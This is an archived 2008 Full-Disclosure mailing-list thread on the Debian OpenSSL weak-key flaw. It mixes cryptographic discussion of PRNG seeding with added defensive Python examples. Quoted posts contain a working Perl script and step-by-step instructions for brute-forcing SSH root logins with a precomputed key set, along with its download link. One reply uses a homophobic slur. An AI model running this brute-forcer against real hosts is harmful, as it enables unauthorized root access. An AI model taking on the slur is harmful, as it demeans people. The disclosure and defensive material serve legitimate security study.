Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Salut, Michael,

On Tue, 20 May 2008 13:41:41 -0400, Michael Holstein wrote:
> Smoke Detector + Webcam = cheapo RNG

We were talking about PRNGs here, which are highly complex mathematical constructs, not hardware RNGs, which are also slightly hairy though. There are a couple of books on PRNG design, and even if you read them you probably still need a couple of years to design a secure PRNG.

> I know some highly secure operations (eg: web casinos, using Geiger counters and background radiation) use a version of this for their RNGs, and random.org does it with RF (radios listening to static) .. do patches exist for OpenSSL to use hardware devices? (short of a hack to take something like the above and pipe it to /dev/random, etc).

OpenSSL would probably be slightly the wrong place to do this. The BSD systems tend to have kernel drivers for various hardware random sources, XORing them into each other to eliminate the problem with weak random sources. You can then distill this through the /dev/random device. OpenSSL needs a build flag to make use of this additional random material; then, I think, they add a certain amount of random material to their MD on each iteration.

Please note that even hardware random sources are of quite varying quality. Like you said, a Geiger counter provides you with quite high-quality random numbers since, to our knowledge, quantum effects are rather hard to predict. You can also use hard disk seek times as an RNG source, but the quality is rather poor in this case, and you should only use it in addition to other sources.

Tonnerre

-- 
SyGroup GmbH                    Tonnerre Lombard
Solutions Systematiques
Tel:+41 61 333 80 33            Güterstrasse 86
Fax:+41 61 383 14 67            4053 Basel
Web:www.sygroup.ch              [EMAIL PROTECTED]

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
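Tonnerre's two points, that raw hardware sources vary widely in quality and that several sources should be combined so a poor one only adds to the pool, can be made concrete with a small amount of code. The block below is an added example, not part of any post in this thread and not OpenSSL's or any BSD driver's code: it estimates the min-entropy of raw samples (the figure a seeding routine should actually credit, as opposed to the more optimistic Shannon figure), works out how many samples a source must deliver for a 256-bit seed, and mixes several sources through SHA-256 with length prefixes instead of a plain XOR. The two sample streams, a mostly-constant "seek time" style source and an ideal uniform one, are constructed for the demo.

```python
"""Sanity checks for raw noise sources and a hash-based conditioner.
Example code added to this archive page; not OpenSSL's or a kernel driver's."""
import hashlib
import math
from collections import Counter
from typing import Sequence


def shannon_entropy_bits(samples: Sequence[int]) -> float:
    # Average information per sample from the empirical distribution.
    # Optimistic: a few rare values inflate it even when one value dominates.
    counts = Counter(samples)
    total = len(samples)
    return -sum((c / total) * math.log2(c / total) for c in counts.values())


def min_entropy_bits(samples: Sequence[int]) -> float:
    # Worst-case unpredictability per sample, set by the single most likely value.
    # This is what to credit when seeding: a guesser always tries the mode first.
    counts = Counter(samples)
    p_max = max(counts.values()) / len(samples)
    return -math.log2(p_max)


def samples_needed_for(samples: Sequence[int], target_bits: int) -> int:
    # How many raw samples this source must deliver to credit `target_bits`.
    return math.ceil(target_bits / min_entropy_bits(samples))


def condition(*sources: bytes, out_len: int = 32) -> bytes:
    # Mix several sources into one seed. Each source is length-prefixed so the
    # boundaries are unambiguous (b"a"+b"bc" must not equal b"ab"+b"c"), and the
    # hash does the mixing: a source an attacker knows, or even controls, cannot
    # cancel out the contribution of a source the attacker does not know, which a
    # plain XOR of equal-length buffers would allow.
    h = hashlib.sha256()
    for s in sources:
        h.update(len(s).to_bytes(4, "big"))
        h.update(s)
    return h.digest()[:out_len]


# Constructed samples (not measurements): a "seek time" style source that
# returns 0xFF nine times out of ten, and an ideal byte source with every value
# appearing equally often.
POOR_SOURCE = [0xFF] * 900 + list(range(100))
GOOD_SOURCE = list(range(256)) * 4


if __name__ == "__main__":
    for name, src in (("poor", POOR_SOURCE), ("good", GOOD_SOURCE)):
        print(f"{name}: shannon={shannon_entropy_bits(src):.3f} bits/sample, "
              f"min-entropy={min_entropy_bits(src):.3f} bits/sample, "
              f"samples for 256 bits={samples_needed_for(src, 256)}")
    seed = condition(bytes(POOR_SOURCE), bytes(GOOD_SOURCE))
    print("conditioned seed:", seed.hex())
```

The contrast between the two estimators is the practical lesson: the poor source scores over a bit per sample on the Shannon figure but only about 0.15 bits of min-entropy, so it needs roughly fifty times more samples than its Shannon figure suggests before it can be credited with a 256-bit seed. Mixing it with a good source through the conditioner costs nothing and never lowers the result below what the good source alone provides.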
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Salut, Garrett,

On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote:
> Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy.

Generating real pseudo-random streams is a hard problem which is way more than what people can handle. Usually, PRNGs are composed of various periodic elements which, in the end, all combined produce a repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC for this as a state machine and extracts some state bits as random stream on every access.

We're not debating the PRNG itself here but the _seed_. OpenSSL supports various ways to influence the state of the PRNG at various stages by XORing in new material; however, Debian chose to only support pre-seeding with uninitialized memory and the Process ID. With the elimination of the uninitialized memory as seed, the seed for the MAC was entirely comprised of the PID. So we're not debating a weakness in the PRNG here at all, which is a _very_ delicate subject.

Tonnerre

-- 
SyGroup GmbH                    Tonnerre Lombard
Solutions Systematiques
Tel:+41 61 333 80 33            Güterstrasse 86
Fax:+41 61 383 14 67            4053 Basel
Web:www.sygroup.ch              [EMAIL PROTECTED]
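Tonnerre's distinction between the generator and its seed is the whole story of this bug, and it can be shown with a toy. The block below is an added example, not part of Tonnerre's post and not OpenSSL's or Debian's code: a deterministic key generator whose only seed input is the PID can produce at most 65,536 distinct keys, every one of which can be precomputed and mapped back to the PID that made it, which is what made a complete blacklist feasible. HMAC-SHA256 stands in for the real key generation and os.urandom for the entropy the patch removed; both substitutions are assumptions of the demo.

```python
"""Toy model of PID-only seeding. Example code added to this archive page;
HMAC-SHA256 replaces real key generation, os.urandom replaces the removed entropy."""
import hashlib
import hmac
import os
from typing import Dict

PID_SPACE = 65536  # the number of distinct PID values the thread cites


def derive_key(seed: bytes) -> bytes:
    # Deterministic stand-in for key generation: same seed, same key, always.
    return hmac.new(b"toy-keygen", seed, hashlib.sha256).digest()


def pid_only_seed(pid: int) -> bytes:
    # The broken configuration: the PID is the entire seed.
    return pid.to_bytes(4, "big")


def mixed_seed(pid: int, extra_entropy: bytes) -> bytes:
    # The intended configuration: PID plus material from another source.
    return pid.to_bytes(4, "big") + extra_entropy


def count_distinct_keys_pid_only() -> int:
    # Walk every possible PID-only seed; the key space can be no larger than this.
    return len({derive_key(pid_only_seed(pid)) for pid in range(PID_SPACE)})


def weak_key_index() -> Dict[bytes, int]:
    # The defender's view: with a seed space this small, every key the generator
    # can ever emit is precomputable and can be mapped back to its PID. This is
    # the idea behind the blacklist that shipped with the fix.
    return {derive_key(pid_only_seed(pid)): pid for pid in range(PID_SPACE)}


def is_weak(key: bytes, index: Dict[bytes, int]) -> bool:
    return key in index


def same_pid_with_entropy_differs(pid: int) -> bool:
    # With real entropy in the seed, two generations under the same PID no longer collide.
    a = derive_key(mixed_seed(pid, os.urandom(32)))
    b = derive_key(mixed_seed(pid, os.urandom(32)))
    return a != b


if __name__ == "__main__":
    index = weak_key_index()
    print("distinct PID-only keys:", len(index))  # 65536
    probe = derive_key(pid_only_seed(4242))
    print("weak key recognised:", is_weak(probe, index), "generated under PID", index[probe])
    print("same PID with entropy differs:", same_pid_with_entropy_differs(4242))
```

Building the full index takes a fraction of a second here, and the real case was only harder by the cost of RSA key generation per PID, which is why a blacklist of every affected key could be shipped alongside the fix.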
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
On Mon, 19 May 2008 13:51:29 EDT, Garrett M. Groff said:
> Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy.

Of course, if you're trying to write a PoC, you don't need to know how to code the API - all you need to do is grab the source for the key-tester that got shipped as part of the OpenSSH patch and snarf out the nicely enumerated list of all vulnerable keys, and use that list as the brute-forcer, 6 per connection attempt. ;)
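The enumerated list Valdis mentions is just as useful on the defending side: an administrator can scan every authorized_keys file for fingerprints on it. The block below is an added example, not Debian's key-tester, not ssh-vulnkey and not OpenSSH code: it parses authorized_keys lines (including ones with a leading options field), computes the key blob's fingerprint in both OpenSSH styles and reports keys whose fingerprint is in a blacklist set. The two ssh-rsa blobs are built from tiny constructed moduli purely so the wire format and hashing can run offline; they are not real keys, and the blacklist is constructed from one of them.

```python
"""Scan authorized_keys lines against a fingerprint blacklist.
Example code added to this archive page; blobs and blacklist are constructed."""
import base64
import hashlib
import struct
from typing import Iterator, List, Set, Tuple


def _ssh_string(data: bytes) -> bytes:
    # RFC 4251 "string": 4-byte big-endian length followed by the bytes.
    return struct.pack(">I", len(data)) + data


def _ssh_mpint(n: int) -> bytes:
    # RFC 4251 "mpint": two's complement, so a leading 0x00 is added when the
    # high bit is set. (n.bit_length() + 8) // 8 yields exactly that extra byte.
    return _ssh_string(n.to_bytes((n.bit_length() + 8) // 8, "big"))


def build_rsa_blob(e: int, n: int) -> bytes:
    # ssh-rsa public key blob (RFC 4253): string "ssh-rsa", mpint e, mpint n.
    return _ssh_string(b"ssh-rsa") + _ssh_mpint(e) + _ssh_mpint(n)


def fingerprint_md5(blob: bytes) -> str:
    # Legacy OpenSSH style: colon-separated hex of MD5 over the key blob.
    return ":".join(f"{b:02x}" for b in hashlib.md5(blob).digest())


def fingerprint_sha256(blob: bytes) -> str:
    # Current OpenSSH style: "SHA256:" plus unpadded base64 of SHA-256 over the blob.
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_authorized_keys(text: str) -> Iterator[Tuple[str, bytes, str]]:
    # Yields (keytype, blob, comment) per key line; blank lines and comments skipped.
    # Simplification: an options field is assumed to contain no whitespace, so the
    # key type is the first field that names an algorithm.
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        for i, field in enumerate(fields):
            if field.startswith("ssh-") or field.startswith("ecdsa-"):
                comment = " ".join(fields[i + 2:])
                yield field, base64.b64decode(fields[i + 1]), comment
                break


def find_blacklisted(text: str, blacklist: Set[str]) -> List[str]:
    # Returns the comment (or the fingerprint, if there is no comment) of every
    # key whose MD5 fingerprint appears in the blacklist.
    hits = []
    for _keytype, blob, comment in parse_authorized_keys(text):
        fp = fingerprint_md5(blob)
        if fp in blacklist:
            hits.append(comment or fp)
    return hits


# Constructed sample data: toy moduli, NOT real RSA keys.
WEAK_BLOB = build_rsa_blob(65537, 0xC0FFEE_1234_5678_9ABC_DEF0_1337)
GOOD_BLOB = build_rsa_blob(65537, 0xDEAD_BEEF_0BAD_F00D_1234_5678_9ABC)
BLACKLIST = {fingerprint_md5(WEAK_BLOB)}

SAMPLE_AUTHORIZED_KEYS = "\n".join([
    "# constructed authorized_keys for the demo",
    "ssh-rsa " + base64.b64encode(WEAK_BLOB).decode() + " weak@example",
    'from="10.0.0.0/8" ssh-rsa ' + base64.b64encode(GOOD_BLOB).decode() + " ok@example",
])

if __name__ == "__main__":
    for hit in find_blacklisted(SAMPLE_AUTHORIZED_KEYS, BLACKLIST):
        print("blacklisted key:", hit)
```

The scan keys on the fingerprint rather than the full blob so the blacklist stays small, which is also why the fingerprint must be taken over the decoded blob and not the base64 text: the same key can be re-encoded with different comments or options and still hash to the same value.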
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
> Generating real pseudo-random streams is a hard problem which is way more than what people can handle. Usually, PRNGs are composed of various periodic elements which, in the end, all combined produce a repeating stream of pseudo-random numbers. OpenSSL uses a modified MAC for this as a state machine and extracts some state bits as random stream on every access.

Smoke Detector + Webcam = cheapo RNG
http://inventgeek.com/Projects/alpharad/overview.aspx

I know some highly secure operations (eg: web casinos, using Geiger counters and background radiation) use a version of this for their RNGs, and random.org does it with RF (radios listening to static) .. do patches exist for OpenSSL to use hardware devices? (short of a hack to take something like the above and pipe it to /dev/random, etc).

Cheers,

Michael Holstein
Cleveland State University
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Yep, agreed.

- G

> Salut, Garrett,
>
> On Mon, 19 May 2008 13:51:29 -0400, Garrett M. Groff wrote:
> > Generating pseudo-random numbers isn't hard given a good API, but writing that API is non-trivial (assuming you want high entropy/low predictability). And, apparently, screwing up that API is also very easy.
>
> [...]
>
> Tonnerre
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Why reinvent the wheel?

On Mon, May 19, 2008 at 6:20 AM, reepex [EMAIL PROTECTED] wrote:
> why don't you code it yourself instead of being a script kiddie faggot. and don't use ;-) to look cool when you beg for warez.
>
> On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote:
> > Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing nicely ;-)
> >
> > On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
> > > Hi full-disclosure,
> > >
> > > the Debian OpenSSL issue means that only 65,536 possible SSH keys are generated, because the only entropy is the PID of the process generating the key. This means that the following Perl script can be used with the precalculated SSH keys to brute-force the SSH login. It works if such a key is installed on an unpatched Debian or any other system manually configured to.
> > >
> > > On an unpatched system, which doesn't need to be Debian, do the following:
> > >
> > > 1. Download http://www.deadbeef.de/rsa.2048.tar.bzip2
> > > 2. Extract it to a directory
> > > 3. Enter into /root/.ssh/authorized_keys an SSH RSA key with 2048 bits, generated on an unpatched Debian (this is the key this exploit will break)
> > > 4. Run the Perl script and give it the location to where you extracted the bzip2 mentioned.
> > >
> > > #!/usr/bin/perl
> > > my $keysPerConnect = 6;
> > > unless ($ARGV[1]) {
> > >     print "Syntax : ./exploiter.pl pathToSSHPrivateKeys SSHhostToTry\n";
> > >     print "Example: ./exploiter.pl /root/keys/ 127.0.0.1\n";
> > >     print "By [EMAIL PROTECTED]";
> > >     exit 0;
> > > }
> > > chdir($ARGV[0]);
> > > opendir(A, $ARGV[0]) || die("opendir");
> > > while ($_ = readdir(A)) {
> > >     chomp;
> > >     next unless m,^\d+$,;
> > >     push(@a, $_);
> > >     if (scalar(@a) >= $keysPerConnect) {
> > >         system("echo ".join(" ", @a)."; ssh -l root ".join(" ", map { "-i ".$_ } @a)." ".$ARGV[1]);
> > >         @a = ();
> > >     }
> > > }
> > >
> > > 5. Enjoy the shell after some minutes (less than 20 minutes)
> > >
> > > Regards,
> > > Markus Mueller
> > > [EMAIL PROTECTED]

-- 
Ronald van der Westen
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
On Mon, 19 May 2008, Ronald van der Westen wrote:
> Why reinvent the wheel?

Why not?
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Anyone have a copy of rsa.2048.tar.bzip2 (http://www.deadbeef.de/rsa.2048.tar.bzip2)? The web server isn't playing nicely ;-)

On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
> [...]
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Yes, Fredrick Diggle will get you a copy :)

On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote:
> Anyone have a copy of rsa.2048.tar.bzip2? The web server isn't playing nicely ;-)
>
> On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
> > [...]
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
why don't you code it yourself instead of being a script kiddie faggot. and don't use ;-) to look cool when you beg for warez.

On Sun, May 18, 2008 at 10:13 AM, bob harley [EMAIL PROTECTED] wrote:
> Anyone have a copy of rsa.2048.tar.bzip2 (http://www.deadbeef.de/rsa.2048.tar.bzip2)? The web server isn't playing nicely ;-)
>
> On Thu, May 15, 2008 at 2:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
> > [...]
Re: [Full-disclosure] Working exploit for Debian generated SSH Keys
Could you never write Perl again, please? Perl Underground should take a shot at your stuff, but you are not worth it.

On Thu, May 15, 2008 at 1:35 AM, Markus Müller [EMAIL PROTECTED] wrote:
> [...]